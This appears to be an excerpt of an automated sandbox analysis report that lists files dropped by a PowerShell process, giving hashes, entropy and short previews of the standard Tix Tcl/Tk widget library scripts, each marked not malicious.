                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:F4uVODKw4hSMaMRCXOyCIHcBF41AI5M2/IqMrkr:GuVa0hSPYyncB2BnP
                                                                                                                                                                                                                      MD5:DCAA4FFF77AD755323834AC30AD8BCFD
                                                                                                                                                                                                                      SHA1:59208BF7FD9B979DE945047AF2CCFB01867C2A9D
                                                                                                                                                                                                                      SHA-256:F184720A70D0E71AAF6199304A6BB2073EFA180571D097585DC7F219FA35A37A
                                                                                                                                                                                                                      SHA-512:FDAAFE310D42156A799D2849BC8371B169679E9A7CCE3F31DC61A23CE88B5670E2B9367EAFF2D846BB094EF9A18C2FC027C72393541556B68BCE1B632B692F2A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: IconView.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# IconView.tcl --..#..#.This file implements the Icon View widget: the "icon" view mode of..#.the MultiView widget. It implements:..#..#.(1) Creation of the icons in the canvas subwidget...#.(2) Automatic arrangement of the objects..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixIconView {.. -classname TixIconView.. -superclass tixCObjView.. -method {...add arrange.. }.. -flag {...-autoarrange.. }.. -static {.. }.. -configspec {...{-autoarrange autoArrange AutoArrange 0 tixVerifyBoolean}.. }.. -default {...{.scrollbar...auto}...{*borderWidth...1}...{*canvas.background..#c3c3c3}...{*canvas.highlightBackground.#d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6431
                                                                                                                                                                                                                      Entropy (8bit):4.997985567820482
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FIHBSSOLW8ZB+MSA3l2h78naf1SVUyCDbx5D2n8LyNEbTUuONLoDJmyc65Fn5Ok1:Q0SOLWiQSl2UwVq9uONLmVcUp
                                                                                                                                                                                                                      MD5:A1DD7F44555DA31A1F283ED2766FB583
                                                                                                                                                                                                                      SHA1:8391B610A019FB152BA16E343E0F5F67FF9CE3FF
                                                                                                                                                                                                                      SHA-256:69C1294FBF03F83D84C541EFEF1FDCB915F668DE86532B00A793A33082B50B14
                                                                                                                                                                                                                      SHA-512:E1EBFDBB0B5D91D892BE7440DF57EECF75B08DB233183C713F584B526FF525E386233AF89B6B32A61C16F073E3997D42CEEA470B760545ADF6D2E8F810A17B06
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Init.tcl,v 1.18 2008/02/28 04:35:16 hobbs Exp $..#..# Init.tcl --..#..#.Initializes the Tix library and performes version checking to ensure..#.the Tcl, Tk and Tix script libraries loaded matches with the binary..#.of the respective packages...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..namespace eval ::tix {..}....proc tixScriptVersion {} { return $::tix_version }..proc tixScriptPatchLevel {} { return $::tix_patchLevel }....proc ::tix::Init {dir} {.. global tix env tix_library tcl_platform auto_path.... if {[info exists tix(initialized)]} {...return.. }.... if {![info exists tix_library]} {.. # we're running from stand-alone module. .. set tix_library ""..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2229
                                                                                                                                                                                                                      Entropy (8bit):5.0591033649823265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL1MjkNavkyHTfRsmf3Y7D4DLNuG8Tx/gLcF/RLaj:FtsdsY3AMsld/gLG/RLaj
                                                                                                                                                                                                                      MD5:C7CB90DCDDD099BE58A4D18A55325EC5
                                                                                                                                                                                                                      SHA1:9015E2FAED81A86FF428B31177EF821CB8D074FC
                                                                                                                                                                                                                      SHA-256:4E6FD36CD91D0CF5FA66BA426AC0D3D8D081BCA1F2A63C4CDEE9C7CFE1054AC1
                                                                                                                                                                                                                      SHA-512:A14D342EF504C8CD5BAFEAE43E4F37A5B790DC8216AE0B71DB31E799FF55CD829FF658AB58A43A273280C3B56DDDFD659F54125E0DC3451A88911AFE573DA8C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: LabEntry.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# LabEntry.tcl --..#..# .TixLabelEntry Widget: an entry box with a label..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixLabelEntry {.. -classname TixLabelEntry.. -superclass tixLabelWidget.. -method {.. }.. -flag {...-disabledforeground -state.. }.. -forcecall {...-state.. }.. -static {.. }.. -configspec {...{-disabledforeground disabledForeground DisabledForeground #303030}...{-state state State normal}.. }.. -default {...{.borderWidth ...0}...{*entry.relief...sunken}...{*entry.width...7}...{*label.anchor...e}...{*label.borderWidth..0}.. }..}....proc tixLabelEntry:ConstructFramedWidget {w frame} {..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1230
                                                                                                                                                                                                                      Entropy (8bit):4.9964438456365965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:RLuxNnOusa9hzB0Mc2plaef5VNHaeYF9xc2McoRQrZH8MC86FO2kvwC2u2XHwyOD:RLu2usad0p2bpvkrdPso2koC2wkQBJ
                                                                                                                                                                                                                      MD5:8B88DBE38BF5AF0F4CEE5A1469CAD3A5
                                                                                                                                                                                                                      SHA1:A10653DDCEAB6D8FCA8D2A01C84C2DEE259DE867
                                                                                                                                                                                                                      SHA-256:CCBDB56014474F646CA69B8EFFF19183B1C46185C4B3DE1EA5C6766107D1A853
                                                                                                                                                                                                                      SHA-512:7FD155AF14AC3B490C4CC2B7925A1EE4C4550B4D322DD9632D4847405C754E45F0B130ACCEC582F11AA2A8816D8AFFBFD02C274C8D37B92BA47DCE0F6B86EE64
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: LabFrame.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# LabFrame.tcl --..#..# .TixLabelFrame Widget: a frame box with a label..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixLabelFrame {.. -classname TixLabelFrame.. -superclass tixLabelWidget.. -method {...frame.. }.. -flag {}.. -static {}.. -configspec {...{-labelside labelSide LabelSide acrosstop}...{-padx padX Pad 2}...{-pady padY Pad 2}.. }.. -alias {}.. -default {...{*Label.anchor c}...{.frame.borderWidth.2}...{.frame.relief..groove}...{.border.borderWidth.2}...{.border.relief..groove}...{.borderWidth . .2}...{.padX .. .2}...{.padY .. .2}...{.anchor . .sw}.. }..}....#---------------------------------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4108
                                                                                                                                                                                                                      Entropy (8bit):4.988584150463501
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL1xoOAWfrEvkWUdC4DtfORhj8xgVFz2BY2Duf11amVyoVQgbcmtJdPD5J7PDx0Q:F120FdC4DBqhoxgLzfEioJgbZnlObE
                                                                                                                                                                                                                      MD5:961C6900D57225F46A7980B5E3DFE54D
                                                                                                                                                                                                                      SHA1:9C6176C922E67CC0027EE9849703D9474B6170EB
                                                                                                                                                                                                                      SHA-256:D7F6C2B4B93EB9969B8F40D6CB268ABFFD1D7ADE4270016A7A4166489C837720
                                                                                                                                                                                                                      SHA-512:C3045A039FF6DCB7AF2314A078740891AE23F6D27B080FDB904A4C8B7BCD1F8A5DE4FC7A8F92E9FB425ADCC0ADB9650A345F8A29589BD5CB0CCEAEDEC10B4A15
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: LabWidg.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# LabWidg.tcl --..#..#.TixLabelWidget: Virtual base class. Do not instantiate..#..# .This widget class is the base class for all widgets that has a..# .label. Most Tix compound widgets will have a label so that..# .the app programmer doesn't need to add labels themselvel...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# LabelSide : top, left, right, bottom, none, acrosstop..#..# public widgets:..#.frame, label..#....tixWidgetClass tixLabelWidget {.. -superclass tixPrimitive.. -classname TixLabelWidget.. -flag {...-label -labelside -padx -pady.. }.. -static {-labelside}.. -configspec {...{-label label Label ""}...{-labelside labelSide Label
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3734
                                                                                                                                                                                                                      Entropy (8bit):5.0102380219779805
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:F8zeOhlOHNucVUUi5HUqmCdkm+zE6gNhNUY:OzEN1UUi5HUi7+zE6gNhNUY
                                                                                                                                                                                                                      MD5:6077A1C42441E55BF0C8FF953C860956
                                                                                                                                                                                                                      SHA1:C8F4A002876091885CCEA7E6A67B80EE7A776CB9
                                                                                                                                                                                                                      SHA-256:868912A8BBB69D8EF266347C40955EEAB186E60D83D1BA17CC28E305A1DBD14D
                                                                                                                                                                                                                      SHA-512:12073A11B37300C1710CBE3DF71F621F7767CEEEB0B10FC04F45945FC82431A8AE3073B1B2F405B720A17E674BCCB2A339EE5EC9F5072603C2A71E6DE5D89532
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ListNBk.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# ListNBk.tcl --..#..#."List NoteBook" widget. Acts similarly to the notebook but uses a..#.HList widget to represent the pages...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixListNoteBook {.. -classname TixListNoteBook.. -superclass tixVStack.. -method {.. }.. -flag {...-height -width.. }.. -configspec {...{-width width Width 0}...{-height height Height 0}.. }.. -forcecall {...-dynamicgeometry -width -height.. }.. -default {...{*Orientation..horizontal}.. }..}....proc tixListNoteBook:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.. set da
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                                                      Entropy (8bit):4.563354635087932
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:MsKd7+RKlO1ENJdQbLH1u:MsKdyR4bNJdQNu
                                                                                                                                                                                                                      MD5:519ABE46C4FD634931AB698708F977A2
                                                                                                                                                                                                                      SHA1:85B20CDABAFED093267B1E6EE91948E2FBBBE277
                                                                                                                                                                                                                      SHA-256:CE1660F59B8EB4EF49B6659A839B98D833A163D4E48838CC40689B63B8E6E40F
                                                                                                                                                                                                                      SHA-512:C63EA1B1B7B870377BAEB8845EA261AA27E57B49832C3DE1F0BDAACCE4F36F4162333969F0CBB3DC448A3BE30E0AF6011015F70B6FBB8C6C489F37403887894D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:tclIndex::...../tools/tixindex *tcl....clean::...-rm -f *.bak *~..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3251
                                                                                                                                                                                                                      Entropy (8bit):4.943220224039847
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLesYvkJjzQYnD6T+COd+9xBfv1bxT9ed0ZeWBSjtOtqvg4OyMSAG+:F/HjzdCId+9xdv1d9SjwtqHOxSAG+
                                                                                                                                                                                                                      MD5:52FB12A1DF7419915706DACF5EB361AE
                                                                                                                                                                                                                      SHA1:95DCFA04A5D1522C03AD0296C1CEB9E18F013D14
                                                                                                                                                                                                                      SHA-256:69F2E71BF5030BC04EFE0249BA153C19625FAAA898C7C2FBA82FF94E1EA4E19D
                                                                                                                                                                                                                      SHA-512:3CE2CE2EA82363AA3A373E895265DA6C89382E18C5BEBF1D2B42B95EB9A270BF9FD9941E897EF9686855CF3B28A12073BD786306E4C03BA645B83C3B8777F1AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Meter.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# Meter.tcl --..#..#.Implements the tixMeter widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixMeter {.. -classname TixMeter.. -superclass tixPrimitive.. -method {.. }.. -flag {...-foreground -text -value.. }.. -configspec {...{-fillcolor fillColor FillColor #8080ff}...{-foreground foreground Foreground black}...{-text text Text ""}...{-value value Value 0}.. }.. -default {...{.relief..sunken}...{.borderWidth..2}...{.width...150}.. }..}....proc tixMeter:InitWidgetRec {w} {.. upvar #0 $w data.. global env.... tixChainMethod $w InitWidgetRec..}....#-------------------------------------------------------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3861
                                                                                                                                                                                                                      Entropy (8bit):4.6965931381819255
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLwUPvk2TT6zpegYYifG1SyVnw6XD5kyYp61NvI1JlH8R1yoFFrT/:Fv8F3Y+Sgkh61ilH+1bFFH/
                                                                                                                                                                                                                      MD5:BD16478B5A47F6FFB710C5DB1796A4FC
                                                                                                                                                                                                                      SHA1:77F09502D094BFA8E3C8097B88A6D6D1AEEE8029
                                                                                                                                                                                                                      SHA-256:ED25F5447D10D516E063F76B124E56D5CF7D83F15AAA8E3997C966D6EF913247
                                                                                                                                                                                                                      SHA-512:67A36852DD4FC87631ED5873BD14AB1753F9A399B3D144282313BDD9D391561EA0EF05C50661C69D489E6FD6C434242764791BE3AD4DC0E5F92C825AF8E14CF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: MultView.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# MultView.tcl --..#..#.Implements the multi-view widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixMultiView {.. -classname TixMultiView.. -superclass tixPrimitive.. -method {...add.. }.. -flag {...-browsecmd -command -view.. }.. -forcecall {...-view.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-view view View icon tixMultiView:VerifyView}.. }.. -alias {.. }.... -default {.. }..}....proc tixMultiView:InitWidgetRec {w} {.. upvar #0 $w data.. global env.... tixChainMethod $w InitWidgetRec..}....#---------------------------------------------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6407
                                                                                                                                                                                                                      Entropy (8bit):4.941916101860637
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FSLjG0kGKIW4t11w8gApzvvgfPF4eOjRDNviWNvIYvP+lcy5IKy/bHUZkq2Ln0pC:wAGBu8gApLGPJOoB5IKy/DUZkq2Ln02J
                                                                                                                                                                                                                      MD5:BCB653578F4B79302AAF2361940684EB
                                                                                                                                                                                                                      SHA1:C2E3B38694323BED268CF18C8F281CAAD7A5AE7E
                                                                                                                                                                                                                      SHA-256:7E0C454C4015BE7807C8A5F3265F1BDF4DF7711C55F6E17322FFF716366509F0
                                                                                                                                                                                                                      SHA-512:34E846817E9116F2E1C9EBFDE1724A65E7DBC5C620CC258E67A2E5F9CDB02BEABF0908C6916832D259278457582C6EC6A6A4EB71A5FD576B0F7D3FE13F4E2323
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: NoteBook.tcl,v 1.7 2004/03/28 02:44:57 hobbs Exp $..#..# NoteBook.tcl --..#..#.tixNoteBook: NoteBook type of window...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixNoteBook {.. -classname TixNoteBook.. -superclass tixVStack.. -method {.. }.. -flag {.. }.. -configspec {...{-takefocus takeFocus TakeFocus 0 tixVerifyBoolean}.. }.. -default {...{.nbframe.tabPadX.8}...{.nbframe.tabPadY.5}...{.nbframe.borderWidth.2}...{*nbframe.relief.raised}.. }..}....proc tixNoteBook:InitWidgetRec {w} {.. upvar #0 $w data.... tixChainMethod $w InitWidgetRec.... set data(pad-x1) 0.. set data(pad-x2) 0.. set data(pad-y1) 20.. set data(pad-y2)
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3164
                                                                                                                                                                                                                      Entropy (8bit):4.8318652798413355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLNjwy2hkXSrX7oMPvAjdRVIke1/G8MbYG8hwnTfyDkTTfyDjJ:FN58Air/GJ10sTfA6TfA1
                                                                                                                                                                                                                      MD5:9B661DE3972A8687ACA2B024F9230DAC
                                                                                                                                                                                                                      SHA1:88539BAC4CC473D3838B44B1D0AC69668866D4D1
                                                                                                                                                                                                                      SHA-256:86608D55BA5A374E5F34C3D0309138C58658CE437072DA5E470D9FAF59BAE712
                                                                                                                                                                                                                      SHA-512:837BF1F8C0C1512D7E149F1ABF3ABABEE50A26AA1C331B7911F3A5458E1AA385D98A3A58A8CE55FB31B906A8FC5A3EB627B8AD0BD1D3CA1A9BF3CCFADE416BAF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: OldUtil.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# OldUtil.tcl -..#..#.This is an undocumented file...#. Are these features used in Tix : NO...#. Should I use these features : NO...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc setenv {name args} {.. global env.... if {[llength $args] == 1} {.. return [set env($name) [lindex $args 0]].. } else {.. if {[info exists env($ename)] == 0} {.. bgerror "Error in setenv: ".. "environment variable \"$name\" does not exist".. } else {.. return $env($name).. }.. }..}..#----------------------------------------------------------------------..#..#..#
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9786
                                                                                                                                                                                                                      Entropy (8bit):4.901405880447482
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:J+Fwtr0EwPsvyO57QT+OX7NvOJ0OLpTencoRuNO4jbb85hzhivU3w1F7tl2X:J+wrNuc7QT+OpvOuWoRuNOm/i9gfdlI
                                                                                                                                                                                                                      MD5:D5CFC2430E08D31175224D228CDA98D0
                                                                                                                                                                                                                      SHA1:30311D7698990083A4039376D442B7868F53075E
                                                                                                                                                                                                                      SHA-256:D3B5DF03DC0EF449D75E91ACAAED9BD7E6A1D30CEF079E5BD50479892E6B0A71
                                                                                                                                                                                                                      SHA-512:401652E56A7A4C7FBC250A3CBF671EC1BE6F45C0BF76C3E921641F11F28711F481A87474B388531EFE4587254DBE81F85FE39E425713EF1D6DBC3DEE413860EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: OptMenu.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# OptMenu.tcl --..#..#.This file implements the TixOptionMenu widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixOptionMenu {.. -classname TixOptionMenu.. -superclass tixLabelWidget.. -method {...add delete disable enable entrycget entryconfigure entries.. }.. -flag {...-command -disablecallback -dynamicgeometry -value -variable...-validatecmd -state.. }.. -forcecall {...-variable -state.. }.. -configspec {...{-command command Command ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoolean}...{-dynamicgeometry dynamicGeometry DynamicGeometry 0 tixVerifyBoolean}...{-state state State normal}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29562
                                                                                                                                                                                                                      Entropy (8bit):4.909102015970434
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:LjgtcjP2j5Larh5pfW3kW5i8y5juN+bNZS4DOxOaq+15c+ocnB6UamU8PsG:LO4vk0W513+0B6UaM
                                                                                                                                                                                                                      MD5:1C9D2B96B7E23CA1B55F503FD73F3817
                                                                                                                                                                                                                      SHA1:6C671ABDC4BC481ED6D162D378AC35F91D66EA57
                                                                                                                                                                                                                      SHA-256:4883F6355FDCF66FE229F10CB33A2C5609CF2DE7AC5E241875AD828F7ADD03AA
                                                                                                                                                                                                                      SHA-512:8E9DF1FAA99BB14EF012784C29AE83E6810AC9208693F85CE466E5602338022B7B2E4BA7312840B801870DC0C8CB768884A28493D7587A359ED416E89F67EAB6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: PanedWin.tcl,v 1.7 2004/03/28 02:44:57 hobbs Exp $..#..# PanedWin.tcl --..#..#.This file implements the TixPanedWindow widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixPanedWindow {.. -classname TixPanedWindow.. -superclass tixPrimitive.. -method {...add delete forget manage panecget paneconfigure panes setsize.. }.. -flag {...-command -dynamicgeometry -handleactivebg -handlebg -orient...-orientation -panebd -paneborderwidth -panerelief...-separatoractivebg -separatorbg.. }.. -static {...-orientation.. }.. -configspec {...{-command command Command ""}...{-dynamicgeometry dynamicGeometry DynamicGeometry 1 tixVerifyBoolean}...{-handleac
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5739
                                                                                                                                                                                                                      Entropy (8bit):5.000960157233981
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FjrPEQJmt0ts/SFwR7Psypm3HDzFyZQGkQ/2B2WZLPLAt9839WBtHTEPE1k4Fn:9rzJmatsKF4PIHvS/cZZPAA39WBtzGEd
                                                                                                                                                                                                                      MD5:FFDDC3DC5B799059A33A843782E2B2AA
                                                                                                                                                                                                                      SHA1:868AC39BB2EFD306DBA00BBD558D98D30C18E3BA
                                                                                                                                                                                                                      SHA-256:2565B9F95FFB0AA2EDDCDD1C5EFD05F480DEABBA11425C217647504674F67628
                                                                                                                                                                                                                      SHA-512:4D0032D756AC15CDC3C3D28F761F10B6BEB968E48DE58E04F6C7E2A087B45C377954D174BAEC9AF1A8EF2E9BC2A1D7C89F2C293202CC10CF2EE5F510F87D3553
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: PopMenu.tcl,v 1.7 2004/03/28 02:44:57 hobbs Exp $..#..# PopMenu.tcl --..#..#.This file implements the TixPopupMenu widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}..#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# inMenubutton -...#--------------------------------------------------------------------------..#..foreach fun {tkMenuUnpost tkMbButtonUp tkMbEnter tkMbPost} {.. if {![llength [info commands $fun]]} {...tk::unsupported::ExposePrivateCommand $fun.. }..}..unset fun....tixWidgetClass tixPopupMenu {.. -classname TixPopupMenu
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10955
                                                                                                                                                                                                                      Entropy (8bit):4.89905288403107
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:bKzbKDtiq6Lc3Cw7DFcpj7Hd/IjftzIwzY0H27RHPFVHIhu:sbKDtiqJb7Dupj7HCZssBHMRHNVHIhu
                                                                                                                                                                                                                      MD5:D6735950CF9C70C3C326799762A7F95D
                                                                                                                                                                                                                      SHA1:A57DBDFCBC5076446FF948FAE23E78DED61C105D
                                                                                                                                                                                                                      SHA-256:EF1FF46F0169258AE2F0AC0FD840D3F58231C6825060B787A3F0F8A5052752D9
                                                                                                                                                                                                                      SHA-512:8260838924FA82537809CC0FB36C01D54DAF6243084213C210A34952C0F879E1CD09086F7793A619BA723CCB2B5CB9059CCF462F4CBA93B28CA5E47FE72F994E
                                                                                                                                                                                                                      Malicious:false
